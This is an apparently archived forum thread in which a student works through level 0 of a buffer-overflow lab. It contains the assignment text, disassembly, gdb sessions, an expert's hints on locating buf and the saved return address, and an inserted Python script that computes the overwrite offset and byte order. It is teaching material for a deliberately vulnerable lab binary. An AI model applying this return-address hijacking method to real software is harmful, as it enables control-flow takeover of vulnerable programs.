Question

Buffer Bomb Phase 0

Asked by: purewin

Starting this Buffer Overflow assignment and I'm not really sure how to proceed. Figure I could just use a kick in the right direction. Here is what I've been given:

Also I tried stepping through the code from the very beginning but I kept getting this error

(gdb) s
Single stepping until exit from function __libc_start_main,
which has no line number information.
Warning:
Cannot insert breakpoint 4.
Error accessing memory address 0x19: Input/output error.

I'm not sure what it means.

I know that I need to inject a string somewhere but I don't really understand how to do this or even figure out what the string needs to be... Any help would be great. Thanks.

Level 0: Candle (10 pts) 
The function getbuf() is called within bufbomb by a function test() having the following C code:
1 void test()
2 {
3 int val;
4 volatile int local = 0xdeadbeef;
5 entry_check(3); /* Make sure entered this function properly */
6 val = getbuf();
7 /* Check for corrupted stack */
8 if (local != 0xdeadbeef) {
9 printf("Sabotaged!: the stack has been corrupted\n");
10 }
11 else if (val == cookie) {
12 printf("Boom!: getbuf returned 0x%x\n", val);
13 validate(3);
14 }
15 else {
16 printf("Dud: getbuf returned 0x%x\n", val);
17 }
18 }
When getbuf() executes its return statement (line 5 of getbuf()), the program ordinarily resumes execution within function test() (at line 8 of this function). Within the file bufbomb, there is a function smoke() having the following C code:
void smoke()
{
entry_check(0); /* Make sure entered this function properly */
printf("Smoke!: You called smoke()\n");
validate(0);
exit(0);
}
Your task is to get bufbomb to execute the code for smoke() when getbuf() executes its return statement, rather than returning to test(). You can do this by supplying an exploit string that overwrites the stored return pointer in the stack frame for getbuf() with the address of the first instruction in smoke(). Note that your exploit string may also corrupt other parts of the stack state, but this will not cause a problem, since smoke() causes the program to exit directly. Some Advice:
All the information you need to devise your exploit string for this level can be determined by examining a disassembled version of bufbomb.
Be careful about byte ordering.
You might want to use GDB to step the program through the last few instructions of getbuf() to make sure it is doing the right thing.
The placement of buf within the stack frame for getbuf() depends on which version of gcc was used to compile bufbomb. You will need to pad the beginning of your exploit string with the proper number of bytes to overwrite the return pointer. The values of these bytes can be arbitrary.  
Dump of assembler code for function test:
0x08048f60 <test+0>:    push   %ebp
0x08048f61 <test+1>:    mov    %esp,%ebp
0x08048f63 <test+3>:    sub    $0x18,%esp
0x08048f66 <test+6>:    movl   $0xdeadbeef,0xfffffffc(%ebp)
0x08048f6d <test+13>:   movl   $0x3,(%esp)
0x08048f74 <test+20>:   call   0x8048920 <entry_check>
0x08048f79 <test+25>:   call   0x8048f40 <getbuf>
0x08048f7e <test+30>:   mov    %eax,%edx
0x08048f80 <test+32>:   mov    0xfffffffc(%ebp),%eax
0x08048f83 <test+35>:   cmp    $0xdeadbeef,%eax
0x08048f88 <test+40>:   je     0x8048f98 <test+56>
0x08048f8a <test+42>:   movl   $0x8049780,(%esp)
0x08048f91 <test+49>:   call   0x8048794 <puts@plt>
0x08048f96 <test+54>:   leave  
0x08048f97 <test+55>:   ret    
0x08048f98 <test+56>:   cmp    0x804a1b0,%edx
0x08048f9e <test+62>:   je     0x8048fb2 <test+82>
0x08048fa0 <test+64>:   mov    %edx,0x4(%esp)
0x08048fa4 <test+68>:   movl   $0x8049957,(%esp)
0x08048fab <test+75>:   call   0x8048724 <printf@plt>
0x08048fb0 <test+80>:   leave  
0x08048fb1 <test+81>:   ret    
0x08048fb2 <test+82>:   mov    %edx,0x4(%esp)
0x08048fb6 <test+86>:   movl   $0x804993a,(%esp)
0x08048fbd <test+93>:   call   0x8048724 <printf@plt>
0x08048fc2 <test+98>:   movl   $0x3,(%esp)
0x08048fc9 <test+105>:  call   0x8048a60 <validate>
0x08048fce <test+110>:  leave  
0x08048fcf <test+111>:  ret    
End of assembler dump. 
Dump of assembler code for function smoke:
0x08048d90 <smoke+0>:   push   %ebp
0x08048d91 <smoke+1>:   mov    %esp,%ebp
0x08048d93 <smoke+3>:   sub    $0x8,%esp
0x08048d96 <smoke+6>:   movl   $0x0,(%esp)
0x08048d9d <smoke+13>:  call   0x8048920 <entry_check>
0x08048da2 <smoke+18>:  movl   $0x8049903,(%esp)
0x08048da9 <smoke+25>:  call   0x8048794 <puts@plt>
0x08048dae <smoke+30>:  movl   $0x0,(%esp)
0x08048db5 <smoke+37>:  call   0x8048a60 <validate>
0x08048dba <smoke+42>:  movl   $0x0,(%esp)
0x08048dc1 <smoke+49>:  call   0x80487d4 <exit@plt>
0x08048dc6 <smoke+54>:  lea    0x0(%esi),%esi
0x08048dc9 <smoke+57>:  lea    0x0(%edi),%edi
End of assembler dump. 
Dump of assembler code for function getbuf:
0x08048f40 <getbuf+0>:  push   %ebp
0x08048f41 <getbuf+1>:  mov    %esp,%ebp
0x08048f43 <getbuf+3>:  sub    $0x18,%esp
0x08048f46 <getbuf+6>:  lea    0xfffffff4(%ebp),%eax
0x08048f49 <getbuf+9>:  mov    %eax,(%esp)
0x08048f4c <getbuf+12>: call   0x8048dd0 <Gets>
0x08048f51 <getbuf+17>: mov    $0x1,%eax
0x08048f56 <getbuf+22>: leave  
0x08048f57 <getbuf+23>: ret    
0x08048f58 <getbuf+24>: nop    
0x08048f59 <getbuf+25>: lea    0x0(%esi),%esi
End of assembler dump.


Asked On: 2009-10-30 at 23:33:18 (ID 24860346)
Topics: Assembly Programming Language, C Programming Language, Miscellaneous Programming
Participating Experts: 2
Points: 500
Comments: 68


Answers

 

by: purewin | Posted on 2009-10-31 at 00:47:53 | ID: 25708809

Okay so I've figured out that I need to overflow the buffer of 15 characters and then add the address of smoke() at the end correct?

I can't seem to figure out how to get it to work though I keep getting a segmentation fault. Not sure what that means either. Any thoughts?

 

by: purewin | Posted on 2009-10-31 at 02:22:11 | ID: 25708979

Still having trouble determining what is needed to insert the memory address of smoke(). Could use some direction on this.... :(

 

by: Infinity08 | Posted on 2009-10-31 at 03:33:46 | ID: 25709125

The assignment very clearly describes what it is you need to do.

But let's see :

>> Your task is to get bufbomb to execute the code for smoke() when getbuf() executes its return statement, rather than returning to test().

How does the code decide where to return to at the end of the function ?
How can you influence that decision ?

 

by: purewin | Posted on 2009-10-31 at 03:51:28 | ID: 25709168

I can't figure out where on the stack I would need to have the call to smoke() overflow onto. I know it's right before getbuf() returns to test but I can't figure out how to take the memory address of smoke and then enter the correct number of bytes to overflow. Am I entering hex numbers followed by the memory location 0x08048d90 for smoke()? And it looks like I would need to insert it at 0x24 on the stack no? I feel like I'm missing something....

 

by: Infinity08 | Posted on 2009-10-31 at 03:57:29 | ID: 25709177

What if you just run the code in the debugger, and take a look at the contents of the stack. And specifically, where the buffer is located on the stack. And where the return address is located on the stack.

 

by: purewin | Posted on 2009-10-31 at 04:00:24 | ID: 25709181

Not sure how I would go about looking at the stack...what sort of commands would that take in gdb I can't think of any atm that would work.

 

by: Infinity08 | Posted on 2009-10-31 at 04:09:48 | ID: 25709203

Remember that at any point, the %esp register contains a pointer to the top of the stack.
Also remember that the stack grows downwards.

So, given the address of the top of the stack, you can display any amount of values you wish from the stack.

 

by: purewin | Posted on 2009-10-31 at 04:10:23 | ID: 25709208

Would it be best to just set a breakpoint at the beginning of the program at main and then just use step from there? Or would it be better to set a break point at test() and step from there? The backtrace command I found to look at the stack isn't really providing me with any information at all.

 

by: Infinity08 | Posted on 2009-10-31 at 04:13:55 | ID: 25709218

>> Would it be best to just set a breakpoint at the beginning of the program at main and then just use step from there? Or would it be better to set a break point at test() and step from there?

Depends how much stepping you want to do, as well as how deep down you want to observe the changes to the stack.


>> The backtrace command I found to look at the stack isn't really providing me with any information at all.

The backtrace only lists the different stack frames currently on the stack. What you want to know is the actual stack layout - ie. all the data on the stack, including function parameters, return addresses and local variables.

 

by: purewin | Posted on 2009-10-31 at 04:15:27 | ID: 25709221

Am I looking for the most recent reference/location of the esp pointer? And the location of that on the stack is where I would need to overflow to?

 

by: purewin | Posted on 2009-10-31 at 04:16:35 | ID: 25709230

>> The backtrace only lists the different stack frames currently on the stack. What you want to know is the actual stack layout - ie. all the data on the stack, including function parameters, return addresses and local variables.

Would the info registers command work for this then?

 

by: Infinity08 | Posted on 2009-10-31 at 04:39:19 | ID: 25709275

%esp is a register. You can display its contents simply by :

        print $sp

or :

        p/x $sp

or as you say by using 'info registers'.

Furthermore, you can get a single 32bit value (shown in hexadecimal) at the top of the stack using :

        x/1xw $sp

('1' is the amount of values you want to see, 'x' is the format which is hexadecimal in this case, and 'w' says we want to see words or 32-bit values)

or if you want to see more from the top of the stack, eg. 4 :

        x/4xw $sp

Refer to the gdb documentation for more information, and more options :

        http://sourceware.org/gdb/current/onlinedocs/gdb_11.html#SEC72

 

by: purewin | Posted on 2009-10-31 at 10:52:08 | ID: 25710694

I'm still not sure what I need to be looking for in the registers, or how to even tell how many bytes I would need to overflow by. It looks like the call to smoke() would be injected into eax here?

0x08048f51 <getbuf+17>: mov    $0x1,%eax

I mean I understand the buffer overflow concept that I need to insert x amount of characters followed by the memory location of smoke(). I don't know where to go from there though and stepping through the program isn't helping me because I'm not sure what I need to be watching for.

 

by: Infinity08 | Posted on 2009-10-31 at 11:02:43 | ID: 25710777

>> I'm still not sure what I need to be looking for in the registers

The only register you need now is the esp register ... the register that points to the top of the stack.

Starting from that address, you can analyze the contents of the stack, and see if you can locate the buffer, return address, etc.

I suggest, you step through the code in the debugger, and at each step you look at the stack contents (the way I showed earlier), and you notice the differences.

 

by: purewin | Posted on 2009-10-31 at 11:04:47 | ID: 25710788

How would I tell where on the stack esp is pointing at on the stack when I reach the return in getbuf()? I have break points set up and tried using info registers and p/x but that doesn't tell me what I was looking for I think. Here is what I did:

I just don't get what I'm missing....

(gdb) break *test
Breakpoint 1 at 0x8048f60
(gdb) break *entry_check
Breakpoint 2 at 0x8048920
(gdb) break *getbuf
Breakpoint 3 at 0x8048f40
(gdb) run -t jalexanb < exploit-raw.txt
Starting program: /home/jalexanb/lab2/bufbomb -t jalexanb < exploit-raw.txt
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
Team: jalexanb
Cookie: 0x5d5f53de 
Breakpoint 1, 0x08048f60 in test ()
(gdb) si
0x08048f61 in test ()
(gdb) 
0x08048f63 in test ()
(gdb) c
Continuing. 
Breakpoint 2, 0x08048920 in entry_check ()
(gdb) 
Continuing. 
Breakpoint 3, 0x08048f40 in getbuf ()
(gdb) si
0x08048f41 in getbuf ()
(gdb) 
0x08048f43 in getbuf ()
(gdb) 
0x08048f46 in getbuf ()
(gdb) 
0x08048f49 in getbuf ()
(gdb) 
0x08048f4c in getbuf ()
(gdb) break *0x08048f56
Breakpoint 4 at 0x8048f56
(gdb) c
Continuing. 
Breakpoint 4, 0x08048f56 in getbuf ()
(gdb) info registers
eax            0x1      1
ecx            0xa      10
edx            0x8590c4 8753348
ebx            0x0      0
esp            0xbfffb3f0       0xbfffb3f0
ebp            0xbfffb408       0xbfffb408
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f56        0x8048f56 <getbuf+22>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f57 in getbuf ()
(gdb) info registers
eax            0x1      1
ecx            0xa      10
edx            0x8590c4 8753348
ebx            0x0      0
esp            0xbfffb40c       0xbfffb40c
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f57        0x8048f57 <getbuf+23>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) p/x $0xdeadbeef
$1 = Value can't be converted to integer.
(gdb) backtrace full
#0  0x08048f57 in getbuf ()
No symbol table info available.
#1  0x08049056 in launch ()
No symbol table info available.
#2  0x080492b1 in main ()
No symbol table info available.
(gdb) p/x $esp
$2 = 0xbfffb40c
(gdb) p/x $0xbfffv40c
$3 = Value can't be converted to integer.
(gdb) 
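Reading the frame off the register values in the session above, as an added example that is not from the thread or the lab's own code: it applies the i386 frame convention Infinity08 describes (esp is the top of the stack; the saved ebp and the return address sit just above the locals) to the `info registers` dump taken at getbuf+22, cross-checks it against getbuf's `sub $0x18,%esp` and `lea 0xfffffff4(%ebp),%eax`, and emulates the `x/<n>xw` read-back Infinity08 explained on a constructed frame image to show what the byte-ordering warning in the assignment is about. The register lines are a constructed copy of the ones posted; the saved-ebp value (0xbfffb428) and the return address (test+30 = 0x08048f7e, the instruction after the 5-byte `call getbuf`) are taken from the dumps and disassembly on this page, and the buf address it derives (0xbfffb3fc) is the same value eax holds after the `lea` later in the thread.

```python
import re
import struct

# Constructed copy of the `info registers` lines captured at the breakpoint
# on getbuf+22 (the `leave`), i.e. before getbuf's frame is torn down.
INFO_REGISTERS_AT_GETBUF_LEAVE = """\
eax            0x1      1
esp            0xbfffb3f0       0xbfffb3f0
ebp            0xbfffb408       0xbfffb408
eip            0x8048f56        0x8048f56 <getbuf+22>
"""

# Read straight off the getbuf disassembly in the question:
#   sub  $0x18,%esp            -> 0x18 bytes of locals below the saved %ebp
#   lea  0xfffffff4(%ebp),%eax -> buf starts at %ebp - 0xc (0xfffffff4 is -12)
GETBUF_FRAME_SIZE = 0x18
BUF_OFFSET_FROM_EBP = 0xfffffff4 - (1 << 32)   # two's complement: -12

# What getbuf's return slot holds on a normal run: the instruction after the
# 5-byte `call getbuf` at test+25, i.e. test+30.
TEST_PLUS_30 = 0x08048f7e
# test's own %ebp, as the register dumps in the thread show it.
TEST_EBP = 0xbfffb428


def parse_info_registers(text):
    """Return {register: value} from gdb `info registers` output."""
    regs = {}
    for line in text.splitlines():
        m = re.match(r"(\w+)\s+(0x[0-9a-fA-F]+)", line)
        if m:
            regs[m.group(1)] = int(m.group(2), 16)
    return regs


def frame_map(regs):
    """Absolute addresses of getbuf's frame slots, from the i386 convention:
    [ebp+4] return address, [ebp] saved caller %ebp, locals below %ebp."""
    ebp, esp = regs["ebp"], regs["esp"]
    if ebp - esp != GETBUF_FRAME_SIZE:
        raise ValueError("register dump does not match getbuf's `sub $0x18,%esp`")
    return {
        "esp": esp,
        "buf": ebp + BUF_OFFSET_FROM_EBP,
        "saved_ebp": ebp,
        "return_address": ebp + 4,
    }


def distance_from_buf_to_return_address(layout):
    """How many bytes past the start of buf the saved return address sits."""
    return layout["return_address"] - layout["buf"]


def put_word(mem, base, addr, word):
    """Store a 32-bit word at addr the way i386 does: low byte first."""
    mem[addr - base:addr - base + 4] = struct.pack("<I", word)


def simulate_frame_memory(layout):
    """Constructed image of the bytes from %esp up through the return slot,
    as they sit in memory on a normal run (buf left as zeros)."""
    base = layout["esp"]
    mem = bytearray(layout["return_address"] + 4 - base)
    put_word(mem, base, layout["saved_ebp"], TEST_EBP)
    put_word(mem, base, layout["return_address"], TEST_PLUS_30)
    return base, mem


def x_xw(mem, base, addr, count=1):
    """Emulate gdb's `x/<count>xw <addr>`: successive little-endian 32-bit words."""
    return [struct.unpack_from("<I", mem, addr - base + 4 * i)[0]
            for i in range(count)]


def word_to_memory_bytes(word):
    """The byte order a 32-bit value has in memory on i386 (low byte first);
    this is why an address read as one word looks reversed byte by byte."""
    return struct.pack("<I", word)


if __name__ == "__main__":
    regs = parse_info_registers(INFO_REGISTERS_AT_GETBUF_LEAVE)
    layout = frame_map(regs)
    for name, addr in layout.items():
        print(f"{name:>15}: 0x{addr:08x}")
    print("buf -> return address:",
          distance_from_buf_to_return_address(layout), "bytes")
    base, mem = simulate_frame_memory(layout)
    words = x_xw(mem, base, layout["saved_ebp"], 2)
    print("x/2xw", hex(layout["saved_ebp"]), [hex(w) for w in words])
    print("0x08048f7e in memory:", word_to_memory_bytes(TEST_PLUS_30).hex(" "))
```

The derived return-address slot (0xbfffb40c) is exactly where esp lands after the `leave` in the session above, which is the kind of cross-check Infinity08 suggests doing at every step.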

 

by: Infinity08 | Posted on 2009-10-31 at 11:10:35 | ID: 25710816

>> How would I tell where on the stack esp is pointing at on the stack when I reach the return in getbuf()?

esp is ALWAYS pointing to the top of the stack.

Just step through the code, and at every step, take note of the stack contents ... See what changes, and draw your conclusions from that.

You do know what the stack is, do you ?

        http://en.wikipedia.org/wiki/Call_stack

 

by: purewin | Posted on 2009-10-31 at 11:18:41 | ID: 25710859

Right, I know esp is always pointing to the top of the stack. Based on that link it looks like my problem is: how do I know what register the return value is stored in? Is it always the same register or should I not even be looking for that?

(gdb) run -t jalexanb < exploit-raw.txt
Starting program: /home/jalexanb/lab2/bufbomb -t jalexanb < exploit-raw.txt
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
Team: jalexanb
Cookie: 0x5d5f53de 
Breakpoint 1, 0x08048f60 in test ()
(gdb) info registers
eax            0xc      12
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb42c       0xbfffb42c
ebp            0xbfffe9f8       0xbfffe9f8
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f60        0x8048f60 <test>
eflags         0x246    [ PF ZF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f61 in test ()
(gdb) info registers
eax            0xc      12
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb428       0xbfffb428
ebp            0xbfffe9f8       0xbfffe9f8
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f61        0x8048f61 <test+1>
eflags         0x246    [ PF ZF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f63 in test ()
(gdb) info registers
eax            0xc      12
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb428       0xbfffb428
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f63        0x8048f63 <test+3>
eflags         0x246    [ PF ZF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f66 in test ()
(gdb) info registers
eax            0xc      12
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb410       0xbfffb410
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f66        0x8048f66 <test+6>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f6d in test ()
(gdb) info registers
eax            0xc      12
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb410       0xbfffb410
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f6d        0x8048f6d <test+13>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f74 in test ()
(gdb) info registers
eax            0xc      12
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb410       0xbfffb410
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f74        0x8048f74 <test+20>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si 
Breakpoint 2, 0x08048920 in entry_check ()
(gdb) info registers
eax            0xc      12
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb40c       0xbfffb40c
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048920        0x8048920 <entry_check>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048921 in entry_check ()
(gdb) info registers
eax            0xc      12
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb408       0xbfffb408
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048921        0x8048921 <entry_check+1>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048923 in entry_check ()
(gdb) info registers
eax            0xc      12
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb408       0xbfffb408
ebp            0xbfffb408       0xbfffb408
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048923        0x8048923 <entry_check+3>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048926 in entry_check ()
(gdb) info registers
eax            0x3      3
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb408       0xbfffb408
ebp            0xbfffb408       0xbfffb408
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048926        0x8048926 <entry_check+6>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048927 in entry_check ()
(gdb) info registers
eax            0x3      3
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb40c       0xbfffb40c
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048927        0x8048927 <entry_check+7>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x0804892c in entry_check ()
(gdb) info registers
eax            0x3      3
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb40c       0xbfffb40c
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x804892c        0x804892c <entry_check+12>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f79 in test ()
(gdb) info registers
eax            0x3      3
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb410       0xbfffb410
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f79        0x8048f79 <test+25>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si 
Breakpoint 3, 0x08048f40 in getbuf ()
(gdb) info registers
eax            0x3      3
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb40c       0xbfffb40c
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f40        0x8048f40 <getbuf>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f41 in getbuf ()
(gdb) info registers
eax            0x3      3
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb408       0xbfffb408
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f41        0x8048f41 <getbuf+1>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f43 in getbuf ()
(gdb) info registers
eax            0x3      3
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb408       0xbfffb408
ebp            0xbfffb408       0xbfffb408
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f43        0x8048f43 <getbuf+3>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f46 in getbuf ()
(gdb) info registers
eax            0x3      3
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb3f0       0xbfffb3f0
ebp            0xbfffb408       0xbfffb408
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f46        0x8048f46 <getbuf+6>
eflags         0x286    [ PF SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f49 in getbuf ()
(gdb) info registers
eax            0xbfffb3fc       -1073761284
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb3f0       0xbfffb3f0
ebp            0xbfffb408       0xbfffb408
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f49        0x8048f49 <getbuf+9>
eflags         0x286    [ PF SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f4c in getbuf ()
(gdb) info registers
eax            0xbfffb3fc       -1073761284
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb3f0       0xbfffb3f0
ebp            0xbfffb408       0xbfffb408
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f4c        0x8048f4c <getbuf+12>
eflags         0x286    [ PF SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048dd0 in Gets ()
(gdb) c
Continuing. 
Breakpoint 4, 0x08048f56 in getbuf ()
(gdb) info registers
eax            0x1      1
ecx            0xa      10
edx            0x8590c4 8753348
ebx            0x0      0
esp            0xbfffb3f0       0xbfffb3f0
ebp            0xbfffb408       0xbfffb408
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f56        0x8048f56 <getbuf+22>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f57 in getbuf ()
(gdb) info registers
eax            0x1      1
ecx            0xa      10
edx            0x8590c4 8753348
ebx            0x0      0
esp            0xbfffb40c       0xbfffb40c
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f57        0x8048f57 <getbuf+23>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) p/x (esp-18)
No symbol table is loaded.  Use the "file" command.
(gdb) p/x *(esp-18)
No symbol table is loaded.  Use the "file" command.
(gdb) p/x esp
No symbol table is loaded.  Use the "file" command.
(gdb) p/x *esp
No symbol table is loaded.  Use the "file" command.
(gdb) si
0x08048f7e in test ()
(gdb) info registers
eax            0x1      1
ecx            0xa      10
edx            0x8590c4 8753348
ebx            0x0      0
esp            0xbfffb410       0xbfffb410
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f7e        0x8048f7e <test+30>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) 
                                              

 

by: Infinity08 | Posted on 2009-10-31 at 11:28:50 | ID: 25710914

>> how do I know what register the return value is stored?

Are you talking about the return address ? If so, that is not stored in a register - it is stored on the stack (one for each stack frame).

Or are you talking about the function return value. If so, that depends on the calling convention used, and the kind of data returned, but you can usually find it in the eax register. It's not relevant to what you need to do though.

 

by: Infinity08 | Posted on 2009-10-31 at 11:29:58 | ID: 25710917

Btw, I notice that you're repeatedly showing the registers ... That will be of very little use for what you need to do. You should be looking at the stack instead, like I've been trying to tell you all along.

 

by: purewin | Posted on 2009-10-31 at 11:43:47 | ID: 25710962

I should step through the code and use the x/nfu addr command to see what is changing?

 

by: Infinity08 | Posted on 2009-10-31 at 11:52:10 | ID: 25710999

>> to see what is changing?

On the stack, yes.

That way, you'll get an idea of how each line impacts the contents of the stack, and you'll be able to spot where the buffer is, and where the return address is on the stack.

 

by: purewin | Posted on 2009-10-31 at 12:04:56 | ID: 25711056

Any way you could give an example of what the buffer and return address would look like? I mean I don't really know what it would look like so the stuff I'm looking at isn't making much sense.

 

by: Infinity08 | Posted on 2009-10-31 at 12:16:40 | ID: 25711113

You can cross-reference between the stack contents you get from the x/nfu's, and the output of the 'frame' and 'info frame x' (where x is the frame number) gdb functions. Just match the values from the frames with the stack memory dump.

For an idea of the layout of the stack, refer back to the wiki I posted earlier :

        http://en.wikipedia.org/wiki/Call_stack#Structure

 

by: purewin | Posted on 2009-10-31 at 22:06:19 | ID: 25712684

Haha wow I just don't get this....

 

by: Infinity08 | Posted on 2009-11-01 at 01:04:31 | ID: 25713073

Which part is it that you don't get ? Did you read up on the call stack ? Did you try to follow along with the code what is happening to the stack ?

 

by: purewin | Posted on 2009-11-01 at 13:10:56 | ID: 25715498

Yes I've read several articles on the call stack and I did try to follow it. I just don't know what I'm looking at/for.

 

by: Infinity08 | Posted on 2009-11-02 at 07:56:42 | ID: 25720505

>> I just don't know what I'm looking at/for.

Well, do you understand what the stack does ? Do you understand what a stack frame is ? Do you know what a stack frame contains ? Can you locate the function parameters, and the return address in the stack frame ?

 

by: purewin | Posted on 2009-11-02 at 22:01:53 | ID: 25726370

Okay, so I've been looking over this stuff and here is what I think things are; correct me if I'm wrong.

(gdb) info frame
Stack level 0, frame at 0xbfffb430:
 eip = 0x8048f57 in getbuf; saved eip 0x8049056
 called by frame at 0xbfffea00
 Arglist at 0xbfffb428, args:
 Locals at 0xbfffb428, Previous frame's sp is 0xbfffb430
 Saved registers:
  ebp at 0xbfffb428, eip at 0xbfffb42c
(gdb) frame 0

>>Locals at 0xbfffb428
Local variables stored here?

>> Saved registers:
 >> ebp at 0xbfffb428, eip at 0xbfffb42c
Return address is ebp?

